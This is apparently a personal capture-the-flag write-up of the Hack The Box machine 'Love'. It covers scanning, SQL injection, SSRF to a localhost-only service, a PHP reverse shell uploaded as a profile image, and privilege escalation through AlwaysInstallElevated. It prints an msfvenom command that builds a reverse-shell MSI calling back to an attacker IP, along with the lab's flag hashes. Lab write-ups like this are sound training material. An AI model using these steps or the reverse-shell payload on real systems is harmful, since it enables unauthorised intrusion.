kedaegan.github.io

Love

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Port 80 Gobuster Scan:

Port 80 Nikto

Port 443 SSLScan:

The Voter parameter on main page is vulnerable to sql injection:

Discovered Databases:

Password hash from duimp on admin database

Port 5000 shows forbidden pages

Initial Foothold

http://staging.love.htb/beta.php has a file scanning php page
hosted testfile and it uploaded:

Put in http://127.0.01:5000/ because I suspect the forbidden page is liestening on localhost only and this owuld possibly retrieve the index:

The profile image upload accepts php files.
Copied a windows php shell from https://github.com/ivan-sincek/php-reverse- shell/blob/master/src/php_reverse_shell.php
Uploaded as profile photo while listening and received a shell

User.txt Proof Screenshot

##

User.txt Contents

255e0a893c609d07f01c20f029eae609

Privilege Escalation

AlwaysInstallElevated

(Link in the pic is valid)

Created a reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.208 LPORT=5555 -f msi -o shell.msi
Uploaded shell.msi
executed the msi

RootScreenshot Here:

Root.txt Contents:

bd7e6637dc0f7d777d416977d908b04f